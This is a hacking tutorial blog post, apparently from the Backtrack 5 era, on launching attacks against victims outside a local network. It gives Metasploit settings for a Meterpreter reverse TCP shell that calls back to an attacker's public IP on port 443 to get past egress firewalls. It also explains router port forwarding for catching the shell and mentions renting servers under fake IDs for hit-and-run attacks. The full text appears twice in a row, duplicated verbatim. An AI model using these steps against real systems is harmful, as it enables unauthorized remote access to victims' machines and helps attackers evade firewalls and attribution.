A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network .
Requirement : 1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)
2. Dedicated Server
3. Cloud Server(I haven't try this ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself Step-By-Step :
1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share 4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP. 5. Control router by ourselves to redirect incoming connection or outgoing connection. Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :
Legends(Attacker) : - Attacker1 use local IP address –> 192.168.8.8 - Attacker1 have public IP address –> 73.67.123.85 - Attacker1 can control his router to redirect any incoming/outgoing traffic. - Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Legends(Victim) : - Victim1 have local IP address –> 192.168.1.2 - Victim2 connected to internet via router+firewall, this firewall onlyport 80 and 443 for outgoing connection - Victim2 connected directly to internet with IP address –> 98.87.112.89 allowing
How to Attack? : Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like : TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS etc(you can scan it first but b
e careful). From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp
set lhost 73.67.123.85
set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8. You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding
Update : If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows) Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud…. Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above. You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise.
Hope it's useful for you.
Requirement : 1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)
2. Dedicated Server
3. Cloud Server(I haven't try this ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself Step-By-Step :
1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share 4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP. 5. Control router by ourselves to redirect incoming connection or outgoing connection. Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :
Legends(Attacker) : - Attacker1 use local IP address –> 192.168.8.8 - Attacker1 have public IP address –> 73.67.123.85 - Attacker1 can control his router to redirect any incoming/outgoing traffic. - Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Legends(Victim) : - Victim1 have local IP address –> 192.168.1.2 - Victim2 connected to internet via router+firewall, this firewall onlyport 80 and 443 for outgoing connection - Victim2 connected directly to internet with IP address –> 98.87.112.89 allowing
How to Attack? : Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like : TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS etc(you can scan it first but b
e careful). From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp
set lhost 73.67.123.85
set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8. You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding
Update : If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows) Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud…. Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above. You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise.
Hope it's useful for you.